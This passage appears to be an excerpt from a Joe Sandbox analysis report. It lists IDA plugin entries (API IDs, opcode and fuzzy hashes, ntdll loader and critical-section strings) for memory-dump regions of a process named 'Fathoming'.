                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$@
                                          • API String ID: 3446177414-1194432280
                                          • Opcode ID: de5283795bfa94aa35ca1e59e6dbaad9699ea41eb81a3538667fdcba29dbe2a9
                                          • Instruction ID: a7ffda841cb8394b07ceb8efc3f0cf83b5be6633539c99ddb35c0d101fb2f449
                                          • Opcode Fuzzy Hash: de5283795bfa94aa35ca1e59e6dbaad9699ea41eb81a3538667fdcba29dbe2a9
                                          • Instruction Fuzzy Hash: 73810871D012699BDB25CF54CC54BDABAB8BF49750F0041EAEA1DB7290D7309E84DFA0
                                          Strings
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 21B5362F
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 21B5365C
                                          • LdrpFindDllActivationContext, xrefs: 21B53636, 21B53662
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 21B53640, 21B5366C
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-3779518884
                                          • Opcode ID: 418d88cfefb24cd0792943f4bb1dd083b1190a7e07e34b770b15c48278f0921d
                                          • Instruction ID: a49e094c1206cd87bf5686c05cca5f6154ef28956646f7ce89308d5067dc5449
                                          • Opcode Fuzzy Hash: 418d88cfefb24cd0792943f4bb1dd083b1190a7e07e34b770b15c48278f0921d
                                          • Instruction Fuzzy Hash: 8D312732900652AEEF1EDF54C884F1776B8FF03758F87412EE9085727ADBA09D808795
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: 1cb4cf35c24e7b5834aed4cd607543c0cd861de8ff781f7ad172e06fc35f057b
                                          • Instruction ID: 8f35cdd3e620e26c2555bc23afefcee7939306f9e64389c23697b819d7d3e6db
                                          • Opcode Fuzzy Hash: 1cb4cf35c24e7b5834aed4cd607543c0cd861de8ff781f7ad172e06fc35f057b
                                          • Instruction Fuzzy Hash: 352179BAE001199FDB14DF79DC40AEE7BF8EF59750F040169E905D3201E730DA168B91
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 21B502BD
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 21B502E7
                                          • RTL: Re-Waiting, xrefs: 21B5031E
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: a4b943ae3fe98596c9ef727b091bb7e57d99259b0abec833a94d1ae2786556d8
                                          • Instruction ID: fd27c838c266577820dcf66c743477cefc1ce76cc541b33fe71a794d17ed655c
                                          • Opcode Fuzzy Hash: a4b943ae3fe98596c9ef727b091bb7e57d99259b0abec833a94d1ae2786556d8
                                          • Instruction Fuzzy Hash: 22E19B30608782AFD759CF28C884B1ABBF4FB8A354F100A6DF5A48B2E1D775D945CB42
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 21BB8B03
                                          • RtlDebugPrintTimes.NTDLL ref: 21BB8B5B
                                            • Part of subcall function 21B22B60: LdrInitializeThunk.NTDLL ref: 21B22B6A
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes$InitializeThunk
                                          • String ID: $File
                                          • API String ID: 1259822791-2412145507
                                          • Opcode ID: 5cc3be777f23bc3d806427b20ca40d7fa2aaa9350f55a0634726caa30cba1cb8
                                          • Instruction ID: c1b707dc0c74b2600466d854896b6464fd3d56c0c1da040caf6e6b9e4bfd4fec
                                          • Opcode Fuzzy Hash: 5cc3be777f23bc3d806427b20ca40d7fa2aaa9350f55a0634726caa30cba1cb8
                                          • Instruction Fuzzy Hash: 3F617E71A1022DABDF2ACF24CC55BE97BB9AB08710F0441E9EA09E7191DA709F84CF54
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 0699d9ade62f641ac4404c49f8bb7877aba0bf81f136f1bef6b6038370b5ff76
                                          • Instruction ID: 3b3b7e31ed6f3ba1bf3614dba7c0fa0a222decbacb745bc452160b681441441a
                                          • Opcode Fuzzy Hash: 0699d9ade62f641ac4404c49f8bb7877aba0bf81f136f1bef6b6038370b5ff76
                                          • Instruction Fuzzy Hash: 34318672E005199FDB14CE29DC80BEE7BF8EF55710F4045A9E949E3240EB309A458FA0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1714c1a76f50593f3d84c5369e994c8aeea39b0471d7727bc01d5cc33bd1e929
                                          • Instruction ID: 3f2c6ad73010abc23e1801611522cb403f1dcb9a06ad16f5602c34303d05d531
                                          • Opcode Fuzzy Hash: 1714c1a76f50593f3d84c5369e994c8aeea39b0471d7727bc01d5cc33bd1e929
                                          • Instruction Fuzzy Hash: 48E11F70E00608DFDB29CFAAC988A8DBBF5FF49310F20452EE946A7261D771A941CF50
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: b662f7b660c748cf2c7dcc004c005b4e46505e697a668c47d383a573ec44d4d2
                                          • Instruction ID: e4b425b720b58bb43e900b49b06b86c8f5239fd34dc6a69e1cf58f28d858e7da
                                          • Opcode Fuzzy Hash: b662f7b660c748cf2c7dcc004c005b4e46505e697a668c47d383a573ec44d4d2
                                          • Instruction Fuzzy Hash: C9714471E01219AFDF49CFA5C988ADDBBB5FF49310F14402EEA05EB254D774AA05CBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: d5cbeaa2260345afdc86b669fe2551362e69e81f8e524321eb0d84a8a1aea10d
                                          • Instruction ID: 4751f854702a93dcd918485e25cfee2f69eb6f6d617dba96fecc33913159f276
                                          • Opcode Fuzzy Hash: d5cbeaa2260345afdc86b669fe2551362e69e81f8e524321eb0d84a8a1aea10d
                                          • Instruction Fuzzy Hash: 76514975B006129FDB0CCE69C4A5A29B7F5FF8A210B10416DEA06DBB61DB75EF41CB80
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: eb52754dedfa39effad0f0b01659d2373756dfa463a2a12dfe21f78b1a4c4c45
                                          • Instruction ID: 233cb71bb4199939f4b80f41e7597523600bd723e01fcaf2b3608934191a72c4
                                          • Opcode Fuzzy Hash: eb52754dedfa39effad0f0b01659d2373756dfa463a2a12dfe21f78b1a4c4c45
                                          • Instruction Fuzzy Hash: 6C510EB2E00219AFEF49CF95D888ADDBBB5FF48354F14812EE905AB264D7359A01CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$Flst
                                          • API String ID: 0-758220159
                                          • Opcode ID: 4509c8b558ce7a145e906067a4404d7f89576b9580b6fd782a141e6a46021fe8
                                          • Instruction ID: 02208740965bd34bcabbac272e318b9ddad90273c114fb207136b80d6594b993
                                          • Opcode Fuzzy Hash: 4509c8b558ce7a145e906067a4404d7f89576b9580b6fd782a141e6a46021fe8
                                          • Instruction Fuzzy Hash: 1A51ABB1E002499FCF1ACF99D48475AFBF4EF46718F56802ED0099B265EB709E85CB80
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 21B6CFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4rw@4rw
                                          • API String ID: 4062629308-2979693914
                                          • Opcode ID: 4ee8661e7e6ed2e66db89a9d47fb1b53ea24249da83997a1ff0c52d6e00d4897
                                          • Instruction ID: 8fc843225690ddf75d0bbec074cfbd0345717e377353dbcd22f51c69079b21be
                                          • Opcode Fuzzy Hash: 4ee8661e7e6ed2e66db89a9d47fb1b53ea24249da83997a1ff0c52d6e00d4897
                                          • Instruction Fuzzy Hash: A141D5B2D00259DFCB29CFA5C990A6EBBF8FF69740F00412AE944DB265D735C905CB61